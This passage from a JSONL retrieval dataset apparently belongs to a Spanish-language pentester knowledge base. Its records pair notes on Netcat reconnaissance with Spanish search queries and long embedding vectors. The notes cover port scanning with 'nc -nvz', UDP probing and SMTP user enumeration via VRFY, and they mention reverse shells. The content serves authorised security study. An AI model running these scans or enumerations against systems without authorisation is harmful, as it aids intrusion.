-0.04192, 0.13517, 0.07174, 0.15632, 0.04646, -0.18142, -0.02264, -0.0517, 0.09101, 0.01397, -0.04141, -0.03621, 0.03192, 0.1495, 0.00511, 0.07737, 0.04497, -0.03119, -0.12758, -0.02511, 0.0696, 0.12156, -0.02504, -0.04373, -0.03848, -0.02301, 0.07053, -0.08579, -0.10938, -0.11297, -0.04443, 0.012, -0.06056, 0.04142, -0.12216, -0.01664, -0.07988, -0.00857, -0.12189, -0.00872, -0.04979, -0.00547, -0.12089, -0.11981, -0.02875, -0.03944, 0.02604, -0.00605, -0.00757, 0.0941, 0.01827, -0.02662, 0.01499, -0.02515, -0.01091, 0.0985, 0.00132, -0.00018, 0.13934, -0.0547, -0.01282, -0.06471, -0.07144, -0.01585, 0.04211, 0.02718, -0.19737, 0.06957, 0.0499, 0.10874, -0.01009, 0.0915, 0.01257, 0.01974, 0.0214, -0.0406, -0.07862, 0.11471, -0.07618, -0.09524, -0.00102, 0.07102, 0.0558, -0.03522, -0.01331, 0.00078, 0.04517, 0.04254, 0.02981, -0.04951, 0.02098, 0.06108, -0.03525, 0.04847, 0.00809, -0.01667, 0.07405, 0.00114, -0.02224, -0.0534, -0.04075, -0.06344, -0.07866, -0.08731, 0.03392, 0.004, 0.06983, -0.002, -0.08447, -0.0184, -0.06657, -0.08387, -0.01124, 0.14808, -0.09807, -0.01548, 0.01056, 0.00918, 0.01599, -0.10665, -0.00511, -0.02487, 0.04369, 0.12241, -0.0124, -0.02798, -0.02286, -0.01471, -0.00374, -0.00466, 0.04632, -0.0541, 0.01488, 0.01596, -0.06018, 0.00303, 0.06241, 0.0335, 0.04531, 0.0226, -0.00064, -0.07435, -0.04456, -0.05322, -0.03933, 0.09946, -0.06158, -0.02337, 0.09478, -0.05457, -0.08823, -0.04085, -0.02405, 0.00116, -0.08344, -0.00279, -0.03202, 0.07811, -0.02693, 0.0484, 0.00634, 0.06772, 0.02278, 0.04947, -0.07583, 0.03187, 0.02029, -0.0747, -0.08458, -0.01914, -0.01195, -0.03141, -0.0296, 0.01855, -0.02637, 0.06484, 0.00027, -0.01636, -0.01865, -0.03284, 0.02428, -0.05693, 0.02005, -0.03109, -0.02175, -0.00838, 0.05819, -0.00028, 0.02111, 0.02011, 0.03359, 0.01289, -0.00549, -0.05029, -0.04001, -0.04905, 0.02492, -0.00032, -0.04264, -0.00647, 0.01476, 0.00151, 0.00653, 0.05676, -0.02548, -0.00373, 0.0718, 0.03681, 0.02424, 0.00016, 0.03854, 0.01623, -0.0656, 0.04252, 0.04372, 0.00132, -0.02908, 0.02666, 0.02125, 0.0061, -0.04142, -0.00115, -0.03707, -0.06579, 0.01949, 0.01575, -0.06767, -0.02666, -0.01135, 0.00431, 0.01067, 0.05966, 0.02164]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "quΓ© programa sirve para analizar el trΓ‘fico de correo electrΓ³nico?", "v": [-0.1238, 0.06024, -0.08126, -0.19024, 0.0267, -0.10614, 0.10705, -0.02107, -0.07843, -0.07624, -0.03039, -0.12517, 0.0519, -0.01342, 0.15505, -0.07612, 0.13115, -0.1115, 0.15208, 0.00706, 0.02034, -0.03257, -0.10054, -0.10413, -0.03752, 0.00935, -0.10386, -0.02552, -0.03354, 0.0763, 0.0247, 0.0465, 0.12658, -0.12404, 0.05786, 0.07654, 0.11484, 0.04554, -0.00036, -0.0281, 0.03641, -0.0814, -0.08778, -0.06004, 0.02636, -0.08306, -0.04345, -0.03157, -0.08372, -0.06681, 0.01023, -0.01159, -0.04549, -0.07855, 0.05999, -0.00558, -0.0221, -0.16333, 0.10539, -0.06882, 0.12018, 0.03775, 0.07171, -0.03642, 0.01508, -0.02942, 0.12401, 0.0024, -0.13307, -0.02478, -0.00626, 0.06323, -0.00023, 0.02508, 0.02495, -0.02659, 0.02325, 0.11258, 0.05585, -0.00657, 0.14089, 0.0432, -0.07619, 0.06869, -0.07459, -0.00346, 0.02123, -0.01711, -0.01034, 0.04442, 0.02004, 0.0821, 0.02643, 0.06806, 0.04991, 0.02097, 0.0051, -0.06288, 0.04424, 0.13094, 0.13091, -0.03072, -0.14355, 0.07008, -0.04111, 0.15443, 0.03126, -0.07359, 0.05091, 0.07808, -0.09347, 0.01414, 0.00059, -0.08826, -0.05908, -0.06402, -0.05052, -0.04211, -0.03879, -0.06806, -0.04483, 0.11203, -0.03863, -0.00694, 0.01378, -0.01749, 0.04195, 0.07852, 0.02781, 0.09342, 0.0299, -0.02057, -0.13144, -0.04828, -0.09047, -0.0512, -0.03515, -0.03223, -0.02853, 0.00574, 0.09713, 0.04297, 0.01525, -0.01218, 0.0234, 0.00504, 0.03092, -0.08483, -0.06747, -0.02679, 0.0375, -0.06984, -0.00288, 0.01516, 0.03047, -0.00565, 0.00661, -0.09535, -0.05268, 0.02115, -0.02678, 0.04137, 0.02515, 0.0143, 0.06689, 0.00214, 0.0011, 0.01259, 0.0742, 0.08524, -0.02028, 0.0123, 0.03432, -0.11944, -0.04569, -0.03869, -0.03967, -0.0439, -0.00168, -0.01873, -0.12183, 0.00397, 0.01094, 0.0229, -0.08048, 0.00988, -0.05368, -0.01447, 0.00792, 0.00369, -0.01385, 0.0444, -0.00741, 0.01572, -0.02208, 0.00419, -0.03305, -0.04756, 0.03156, -0.07383, -0.08002, -0.03898, 0.0392, -0.02026, -0.01196, 0.08175, -0.03207, -0.00963, 0.03912, 0.12371, -0.02356, -0.0752, 0.03069, -0.01409, -0.00437, -0.04673, 0.01647, 0.02777, 0.05365, 0.09829, -0.00047, -0.00334, -0.02961, -0.00174, -0.02723, -0.01581, 0.05739, 0.01, 0.0635, 0.02476, -0.03991, 0.0094, -0.02072, -0.01636, 0.01982, 0.00944, -0.02359, -0.03609, -0.05863, -0.0958, 0.06329, 0.05877, -0.08766, -0.06498, -0.00125, -0.01256, -0.09822, 0.00195, -0.01887, -0.02509, -0.07242, 0.03139, 0.00846, -0.0335, 0.07382, -0.00095]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "cual es una herramienta para inspeccionar correos POP3 en tiempo real?", "v": [-0.06281, 0.05555, -0.03649, -0.02902, 0.02558, -0.16349, 0.12957, -0.11602, 0.0243, -0.09136, 0.01929, -0.00165, 0.13751, -0.07503, 0.03625, 0.00361, 0.09597, 0.019, -0.0293, 0.02469, -0.01382, -0.04214, -0.24959, -0.03377, -0.02265, 0.01293, 0.05139, 0.01642, -0.11036, 0.0752, 0.04234, -0.02631, 0.00351, -0.06061, -0.06363, -0.00179, 0.11971, 0.04372, -0.07105, 0.07233, 0.09861, 0.05094, -0.1305, 0.06269, -0.01143, -0.03108, -0.01016, 0.0558, -0.11561, 0.02366, -0.08096, -0.07453, -0.12166, 0.02649, -0.03757, -0.09942, 0.20625, -0.10084, 0.04627, -0.07491, -0.08973, 0.04185, 0.02403, -0.01844, 0.01458, -0.04091, 0.07014, -0.11695, -0.16728, -0.04557, -0.04906, 0.01681, 0.05646, 0.01647, 0.00058, -0.0119, 0.019, -0.00413, -0.07387, -0.01651, 0.10181, -0.06885, -0.02583, 0.07596, -0.06937, -0.16728, 0.07976, -0.10557, -0.08508, -0.13858, 0.01647, 0.10411, -0.0708, 0.11391, -0.03117, -0.01098, -0.04799, -0.07182, -0.06898, 0.11515, 0.0541, -0.04027, -0.14618, 0.09825, -0.06664, 0.05731, -0.06156, 0.04338, 0.05319, 0.01679, -0.05528, 0.02393, 0.00818, 0.0063, 0.06774, -0.06065, 0.02903, -0.10325, 0.03179, -0.14615, 0.06026, 0.0324, -0.04471, -0.01648, 0.02196, -0.05479, -0.03584, -0.063, 0.02409, 0.00109, -0.01739, -0.0207, -0.0735, -0.03676, -0.03805, -0.08556, -0.08841, -0.1035, 0.01131, -0.08084, 0.00157, 0.01014, -0.02381, -0.13555, 0.0019, 0.04357, -0.00324, -0.05534, -0.14109, -0.01732, 0.03768, -0.03937, 0.00923, 0.03056, -0.00075, 0.01593, 0.00602, -0.02878, -0.05434, 0.04226, -0.00517, 0.02778, 0.0145, -0.0288, 0.0344, -0.06413, 0.05308, 0.10029, -0.01251, 0.01813, -0.01841, -0.02628, 0.01428, -0.00422, -0.04811, -0.0736, -0.0269, 0.03543, 0.0043, -0.04507, -0.02878, 0.03523, -0.0239, -0.01978, -0.03465, -0.05971, 0.05129, 0.03828, 0.03631, 0.03551, 0.03044, -0.01747, 0.02554, 0.01166, 0.00879, 0.01344, -0.02386, -0.10779, -0.02661, -0.05602, -0.03841, -0.03754, 0.01401, -0.03485, -0.00526, 0.03096, -0.04678, 0.0281, -0.04463, 0.02177, 0.0173, -0.02773, 0.04399, -0.0135, -0.00137, -0.0304, 0.06085, 0.00458, -0.03248, 0.01012, 0.02186, 0.0236, 0.02343, -0.05126, -0.0888, 0.00552, 0.03329, 0.07345, 0.01019, 0.00662, 0.01482, 0.06215, 0.02562, -0.01554, 0.04986, -0.00695, 0.11364, -0.06302, -0.03257, -0.07497, 0.02487, 0.04742, 0.00021, 0.03712, -0.02015, -0.00323, -0.08619, -0.04763, -0.07404, -0.04692, -0.05101, 0.04536, 0.01312, -0.01073, 0.08177, -0.07466]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "con quΓ© puedo ver si hay problemas en los protocolos SMTP o HTTP?", "v": [-0.03283, 0.03027, -0.12453, -0.06378, -0.01182, -0.10891, 0.05262, -0.09551, 0.06524, 0.13389, -0.15696, 0.19138, 0.18308, -0.02901, 0.04613, 0.04557, 0.07156, -0.16038, 0.15742, -0.11617, 0.01461, -0.04768, -0.07396, -0.06029, -0.01556, -0.02727, 0.06445, 0.08448, -0.13925, -0.13736, 0.03356, -0.0813, -0.06301, 0.09589, -0.11015, 0.08335, -0.03203, 0.13602, 0.01065, 0.07908, -0.00252, -0.04862, 0.04236, -0.02102, -0.01251, -0.02843, -0.02585, -0.12641, 0.04278, -0.14994, -0.14339, 0.06236, -0.17485, 0.00204, -0.1364, 0.17021, 0.05079, -0.05564, 0.0106, -0.06926, -0.07065, -0.02141, 0.06116, -0.02287, 0.02319, -0.1016, 0.00207, 0.07625, -0.09263, 0.09595, -0.02069, 0.04244, 0.02365, -0.02912, 0.08808, 0.08759, -0.10266, -0.03477, 0.02606, 0.06363, 0.08014, 0.03019, -0.00509, 0.02946, -0.1019, -0.07418, -0.03056, -0.02256, 0.02644, -0.102, 0.00817, 0.11858, -0.03383, -0.08995, -0.05869, -0.05991, 0.03984, -0.01761, 0.05791, 0.02106, -0.05063, 0.05381, -0.0809, 0.08245, 0.00165, 0.04488, 0.1079, -0.06316, 0.05766, -0.08892, -0.08408, 0.02133, -0.0424, -0.03109, -0.06087, 0.00181, -0.03656, 0.02413, -0.03156, -0.0275, -0.07231, -0.06638, -0.02815, -0.02603, -0.00661, 0.00012, 0.03614, 0.10273, 0.0554, -0.00047, -0.04691, -0.02169, -0.09062, -0.0315, -0.03565, 0.02787, 0.00299, -0.09054, -0.01605, 0.01909, -0.02707, 0.01989, -0.07602, -0.02116, 0.05781, 0.01001, -0.00024, -0.07123, -0.1163, 0.00305, 0.04631, 0.05655, -0.00527, 0.01582, -0.05397, -0.001, 0.00186, -0.07298, -0.00216, 0.08401, 0.02045, 0.01804, 0.0138, 0.04636, 0.00945, 0.09451, -0.11284, 0.02968, 0.05712, -0.03198, 0.02001, 0.06376, -0.02917, -0.09541, -0.03537, -0.05938, -0.06341, -0.0341, 0.02788, -0.02765, -0.04602, 0.02277, 0.00909, 0.02369, 0.01696, -0.08301, 0.0412, -0.01551, 0.02395, -0.03315, 0.00549, 0.05211, -0.01444, 0.04268, 0.00127, -0.02738, -0.03973, -0.02035, -0.01569, -0.00607, -0.03247, -0.00765, 0.04284, -0.06, 0.01784, -0.00302, -0.03506, 0.04785, -0.00726, -0.01153, 0.05225, -0.02291, 0.06307, -0.06359, -0.04543, 0.02252, 0.03062, 0.02847, 0.00474, -0.02692, 0.026, 0.0122, 0.01989, -0.01727, 0.03935, -0.02698, 0.02363, -0.02777, 0.05199, 0.00843, -0.01222, 0.00593, -0.05435, -0.00591, 0.08368, 0.05741, -0.04696, -0.00783, -0.02231, -0.02625, 0.03163, 0.02199, -0.02697, -0.04182, 0.01635, -0.01714, -0.11295, -0.01929, -0.04369, -0.02388, -0.05076, -0.00594, 0.05836, -0.03778, -0.02973, -0.0264]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "que programa puedo usar para escanear puertos de forma interactiva?", "v": [0.16645, 0.00199, -0.21793, -0.098, 0.08956, -0.10213, 0.10103, -0.1831, -0.12421, -0.06487, -0.10319, 0.03376, 0.02197, -0.05828, -0.06777, -0.02162, 0.06494, -0.03489, 0.0558, 0.06788, -0.01105, 0.01882, -0.11369, -0.06037, -0.02468, 0.07677, -0.03917, -0.02582, -0.00258, 0.00247, -0.06275, 0.09192, 0.13608, -0.03713, -0.03866, -0.16813, 0.07443, -0.05465, 0.16411, 0.06105, 0.01954, 0.03163, -0.08999, -0.05195, 0.10265, 0.04812, -0.02388, -0.0264, -0.00071, 0.02076, -0.03248, 0.02115, -0.0725, 0.07023, -0.00397, -0.13205, 0.03126, -0.10384, -0.08704, -0.07042, 0.02345, 0.07567, -0.02225, -0.0597, 0.01082, -0.02965, 0.02291, 0.02735, -0.12908, 0.05511, -0.04606, 0.03443, 0.05724, 0.04158, 0.01397, -0.01362, -0.0211, -0.02635, 0.06176, 0.05696, -0.03688, -0.00167, 0.055, 0.02982, -0.08018, -0.02182, -0.02223, -0.10428, 0.02444, -0.15443, 0.01132, -0.00249, 0.05368, 0.08986, -0.02495, -0.09319, 0.02687, 0.09537, 0.04003, 0.02001, 0.05488, 0.01503, -0.07149, 0.11553, -0.01978, 0.01826, 0.04859, -0.05208, 0.00592, 0.06574, 0.08122, 0.01428, -0.02414, -0.09721, -0.11308, 0.06781, -0.03966, -0.0884, 0.02893, -0.04297, -0.03451, -0.03717, -0.04825, -0.01667, 0.13162, 0.0062, -0.00147, 0.09816, -0.02111, 0.07825, -0.01559, -0.06311, -0.01744, -0.10933, -0.08437, -0.13022, 0.00476, -0.09545, 0.01642, -0.04075, -0.00779, 0.09688, -0.04561, -0.00415, -0.04002, 0.01838, 0.03643, -0.01763, -0.04541, -0.00594, 0.05267, -0.00103, -0.06383, 0.03102, -0.06234, 0.01222, 0.15795, -0.0004, -0.10647, 0.04318, -0.08915, -0.02631, -0.03039, -0.0034, 0.04706, -0.10138, -0.05279, -0.00592, 0.00909, 0.03791, 0.00815, 0.16761, 0.02549, -0.0945, 0.01937, 0.01566, -0.05334, -0.04697, -0.04161, -0.06899, -0.06, 0.07599, -0.00517, -0.04521, -0.05554, -0.07162, -0.03072, -0.03041, -0.05446, 0.05786, -0.03162, 0.05352, 0.00909, 0.0015, 0.00933, 0.01429, 0.02553, 0.08007, 0.02668, -0.05842, 0.00825, 0.03478, 0.02384, -0.02903, 0.06942, 0.08484, -0.07593, 0.00852, 0.11049, 0.09617, 0.0051, -0.06167, 0.07401, 0.02434, 0.01844, -0.01371, -0.03058, 0.05793, 0.053, 0.07587, -0.05409, 0.04662, -0.00472, 0.06367, 0.00734, -0.01694, 0.02998, 0.0377, 0.01069, 0.01599, 0.01547, -0.04538, -0.0081, -0.0345, 0.00765, -0.02706, -0.02098, 0.00561, -0.00838, -0.06397, -0.00104, 0.07411, -0.01679, 0.01304, 0.02252, -0.05653, -0.03793, 0.03801, 0.00483, -0.00533, -0.05637, 0.03665, 0.02599, -0.05598, 0.00452, 0.0143]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "como hago un scan de puentes UDP sin que sea demasiado inexacto?", "v": [0.01049, -0.18503, -0.19037, 0.04654, 0.02939, 0.0595, -0.06615, -0.02503, -0.02187, 0.01051, -0.13236, -0.00105, -0.05029, -0.08261, -0.17803, -0.06938, -0.02017, 0.0096, 0.0389, -0.1379, -0.02495, 0.00432, 0.03052, -0.01598, 0.07419, -0.0634, -0.04964, 0.07869, -0.04086, 0.02868, 0.04394, 0.15233, -0.02924, 0.04202, -0.08077, -0.11316, 0.02196, 0.06532, 0.19896, 0.10331, -0.00282, -0.02162, -0.0651, -0.11562, -0.01734, -0.04218, -0.13388, 0.08761, -0.0481, -0.09168, -0.12576, -0.09504, -0.16933, -0.02664, -0.10403, 0.06062, 0.04108, 0.069, 0.06273, -0.05877, 0.00151, 0.09219, 0.06144, -0.02324, -0.00766, 0.06732, -0.05242, -0.02906, -0.10413, 0.05754, -0.05603, -0.01837, 0.02436, -0.03398, 0.00809, -0.03303, -0.06222, -0.11302, 0.12863, -0.02047, 0.09904, -0.02334, -0.10876, -0.00897, -0.06183, -0.00777, -0.08472, 0.00837, 0.03418, 0.02188, -0.06119, -0.14724, 0.05621, 0.04306, 0.06296, -0.02199, -0.12055, 0.01848, 0.0186, 0.08483, 0.05536, 0.09928, -0.08215, 0.04541, 0.02015, 0.05436, 0.00695, -0.00024, 0.02128, -0.03775, 0.05463, 0.10048, -0.03349, -0.14504, -0.03574, 0.05423, -0.06894, -0.00119, -0.04874, -0.07017, 0.05192, -0.08615, 0.00981, 0.03429, 0.01913, -0.01948, 0.00711, 0.05789, 0.08309, 0.05088, 0.04252, 0.00172, -0.1354, -0.01561, -0.00614, -0.01601, 0.03144, 0.00022, -0.02297, -0.04349, -0.06335, 0.05333, -0.00408, -0.00446, -0.03387, 0.05422, -0.09383, -0.00838, -0.02131, -0.03318, -0.01202, -0.03248, -0.00822, 0.07915, 0.02387, -0.04669, 0.00427, 0.01389, -0.01258, 0.10998, 0.00153, -0.01527, 0.02701, 0.05455, 0.01438, 0.11257, -0.11056, 0.0536, -0.00894, -0.0884, 0.00077, 0.08623, -0.02449, -0.05161, -0.00185, -0.06006, -0.0108, -0.04283, 0.00975, -0.0524, -0.05131, -0.05054, 0.01548, 0.06246, 0.06005, -0.07081, 0.02601, -0.02471, 0.0353, 0.02329, 0.04453, 0.02633, 0.04494, 0.02809, 0.01805, -0.01269, 0.01828, -0.03618, 0.02805, -0.05391, 0.01446, -0.08171, 0.0718, -0.11013, 0.03405, 0.01468, -0.05739, 0.05491, -0.0179, 0.09186, 0.02438, -0.06374, 0.07322, -0.06434, -0.02042, -0.02831, 0.04176, -0.01974, -0.01254, 0.04936, 0.0114, 0.01863, -0.03631, -0.03782, -0.07043, 0.03477, 0.03559, 0.06571, 0.01686, 0.01785, 0.07001, 0.03407, -0.08699, -0.01842, 0.03025, 0.00394, -0.03675, 0.00518, 0.00106, -0.10166, 0.09178, 0.0164, 0.0233, -0.06849, 0.02558, 0.00364, -0.05885, 0.05397, 0.07352, -0.0417, 0.01735, 0.04435, 0.01564, 0.02386, 0.05302, -0.042]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "con que herramienta puedo verificar si los servicios SNMP o SMB estΓ‘n abiertos en la red?", "v": [-0.0128, 0.03991, -0.21523, -0.13633, -0.05178, -0.14621, -0.22118, -0.13299, -0.06391, -0.05495, -0.19179, -0.07693, 0.16997, -0.26145, 0.04034, 0.20213, -0.07922, -0.19975, 0.02953, 0.12936, 0.0505, -0.05033, -0.02074, -0.05202, 0.00458, 0.10144, 0.02521, -0.00711, -0.11279, 0.04723, 0.00668, -0.00806, -0.02799, -0.01672, -0.0767, -0.0054, 0.01502, 0.05665, 0.06541, 0.01601, -0.02582, -0.01022, 0.00979, -0.0408, 0.04152, -0.00134, -0.02496, -0.00854, -0.07746, 0.07435, -0.02667, -0.08424, -0.18683, -0.05987, -0.15602, -0.05509, 0.06861, -0.0219, -0.04042, -0.03464, -0.01642, 0.03366, 0.00348, -0.02036, 0.04899, -0.08088, 0.03082, 0.00774, -0.01268, 0.03142, -0.07428, 0.02227, 0.00136, 0.01269, -0.09247, 0.03034, -0.00213, -0.01808, 0.11529, 0.03359, 0.05637, 0.08259, -0.04633, 0.00908, -0.03856, -0.10795, 0.02256, -0.0828, -0.01095, -0.09917, 0.00551, 0.16313, 0.06071, 0.10701, -0.01711, 0.00915, 0.03587, -0.06178, 0.05843, -0.00932, 0.1353, 0.04329, -0.07493, -0.00982, -0.02704, -0.00245, 0.0409, -0.00011, -0.00267, -0.00064, 0.02998, -0.00906, -0.02758, -0.00513, 0.01178, -0.03334, -0.05742, -0.07717, -0.01322, -0.04452, 0.0497, -0.00408, -0.12129, -0.02134, -0.01779, -0.05696, -2e-05, 0.01082, 0.0198, 0.00261, 0.00323, -0.0361, -0.08147, -0.01919, 0.00231, -0.07812, -0.03767, -0.09433, 0.05796, -0.0448, -0.04666, -0.01458, -0.0017, -0.12102, 0.02503, 0.00588, -0.05611, -0.05209, -0.04048, 0.02383, 0.0509, -0.03046, -0.05235, 0.07013, 0.00966, 0.07814, 0.01417, -0.00222, -0.05936, 0.08252, -0.06552, -0.05075, 0.06241, 0.05539, 0.02426, 0.01665, 0.04879, 0.01444, 0.07285, -0.01772, -0.03914, 0.01937, 0.0172, -0.03955, 0.0102, -0.09406, -0.04596, -0.03385, 0.0492, -0.09434, -0.0254, -0.02684, -0.05533, -0.01905, -0.03765, -0.05314, 0.02773, -0.0607, 0.01895, -0.02935, 0.01939, 0.01772, 0.05409, 0.0134, 0.0465, 0.01419, 0.01702, 0.01589, -0.03647, -0.01455, -0.06942, 0.03035, -0.10665, -0.07673, -0.00157, 0.04775, 0.0096, 0.06412, 0.00512, 0.05569, 0.015, -0.01739, 0.0809, -0.06539, -0.02789, -0.05078, 0.00959, 0.04622, 0.02587, -0.01118, 0.05318, -0.00725, 0.03142, -0.02433, -0.02878, -0.03447, -0.01081, 0.00863, 0.03194, 0.01364, 0.02896, -0.0008, -0.00801, -0.00577, 0.03748, -0.04244, 0.04793, 0.00848, -0.0071, -0.00059, -0.00544, 0.02414, -0.04264, -0.02406, 0.0079, 0.00421, -0.04402, -0.05053, 0.00346, -0.07811, 0.00913, 0.01324, 0.03438, -0.05907, 0.00924, -0.0168]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que comando de bash sirve para enumerar usuarios en un servidor SMTP?", "v": [-0.06576, -0.04941, -0.16403, -0.22711, -0.08025, -0.17744, -0.02627, -0.12982, 0.03406, 0.07693, -0.12898, 0.07114, 0.21098, -0.11746, 0.01062, 0.05253, 0.1216, -0.09941, 0.12881, 0.00307, 0.1437, 0.08295, 0.07819, 0.01184, -0.04668, 0.08443, -0.02157, -0.10257, -0.11527, -0.01656, 0.03645, -0.08778, -0.00942, -0.04586, 0.02431, -0.00213, -0.03582, 0.0398, -0.07218, 0.24846, 0.00092, 0.00357, -0.11417, 0.01038, 0.02453, 0.00143, 0.08101, -0.07462, 0.13956, -0.05524, -0.12717, -0.04227, -0.14404, -0.01383, -0.10693, 0.02264, 0.07967, -0.15021, 0.01013, -0.033, -0.14393, -0.06298, -0.00622, 0.03516, -0.02153, 0.02418, -0.04368, -0.10306, -0.03576, 0.01539, -0.10601, 0.08437, -0.0055, -0.02148, 0.056, 0.0118, -0.03941, 0.00988, 0.10341, 0.05683, -0.015, -0.01696, -0.07292, 0.06194, -0.10497, -0.09847, 0.00965, -0.01366, 0.02552, 0.04151, 0.02, 0.10622, -0.0142, 0.04588, 0.0495, 0.00376, 0.0799, -0.06401, 0.06245, 0.01995, 0.04279, 0.015, -0.08027, 0.14316, 0.01622, 0.05922, 0.1175, -0.07827, 0.0531, -0.00342, 0.05552, -0.10391, 0.0146, -0.00878, -0.05657, -0.09626, -0.05321, -0.0454, -0.00269, 0.02212, -0.05881, -0.05149, 0.04232, 0.03827, 0.0285, -0.02117, 0.04472, 0.01594, 0.06076, -0.06621, 0.0022, 0.00504, -0.00113, -0.03759, -0.05117, 0.0651, 0.03498, -0.02367, -0.08697, -0.0278, -0.0009, 0.10659, -0.081, 0.00164, 0.07141, -0.03383, 0.0995, -0.07746, -0.05471, 0.0175, 0.05954, 0.00858, -0.1086, -0.02262, -0.04008, -0.00554, -0.01878, -0.04598, -0.06664, 0.02878, 0.01893, -0.03531, -0.00395, 0.07981, -0.00871, -0.00991, -0.02211, 0.01918, 0.03444, 0.03112, -0.0057, 0.02388, 0.00693, -0.02035, 0.00887, -0.05888, -0.01324, -0.0053, -0.0159, 0.05841, 0.00617, -0.0189, 0.00104, -0.00014, -0.03707, -0.04431, 0.00143, -0.00265, -0.0035, -0.03579, -0.02228, 0.05766, 0.01423, -0.00731, 0.01513, -0.04899, 0.02425, -0.01055, -0.04291, -0.042, -0.01378, 0.03726, -0.006, -0.02495, 0.02488, -0.06396, -0.02314, 0.06312, 0.04278, -0.02894, -0.01585, 0.02461, 0.04165, -0.01211, -0.02223, -0.04072, 0.07016, -0.01077, 0.01279, -0.03641, -0.04358, -0.01808, -0.03117, 0.00825, -0.00381, 0.02442, -0.04386, -0.07038, 0.05738, -0.00052, -0.02832, -0.03825, -0.00402, -0.00341, 0.0191, -0.04411, -0.02356, 0.01833, 0.01109, -0.04664, -0.02296, 0.03669, -0.03891, -0.05754, -0.02663, -0.06006, -0.05009, -0.03587, -0.07016, -0.00437, -0.02369, -0.04905, 0.00602, -0.02184, -0.06356, -0.02105]} -{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que puedo verificar si un usuario existe en el port 25?", "v": [-0.05527, 0.14853, -0.2694, -0.01741, 0.04078, -0.04846, 0.06084, -0.0913, -0.01785, -0.18907, -0.01853, -0.08277, 0.00789, -0.0353, -0.03619, -0.03277, 0.05083, 0.00693, 0.08011, 0.03145, 0.11253, -0.10083, -0.04756, -0.06255, 0.0189, 0.15584, -0.03177, -0.04122, -0.02227, -0.01203, -0.01248, -0.02525, 0.01097, -0.02498, -0.06607, -0.03792, 0.04778, 0.05309, 0.13689, 0.11714, 0.07645, 0.07619, -0.01039, 0.04034, 0.02012, 0.04569, -0.07535, -0.08622, -0.01653, -0.02185, 0.04843, -0.04144, -0.14981, 0.05835, -0.08184, -0.06199, 0.07071, -0.03935, 0.06837, -0.11148, -0.03408, 0.04011, 0.01624, 0.03486, -0.05883, 0.01392, 0.02471, 0.06563, -0.01558, 0.03872, -0.02976, 0.0441, -0.05707, -0.03617, -0.03887, -0.03993, 0.07669, 0.03575, 0.10871, 0.03885, -0.0034, 0.02579, -0.03733, -0.10218, -0.12145, -0.1721, -0.02354, -0.11304, -0.00928, -0.13009, 0.04245, 0.06223, 0.05229, 0.09176, -0.03713, -0.0179, -0.06268, -0.05991, -0.07042, -0.08142, 0.14309, 0.07458, -0.07784, 0.0399, 0.01556, -0.03693, 0.09417, -0.09758, -0.03131, 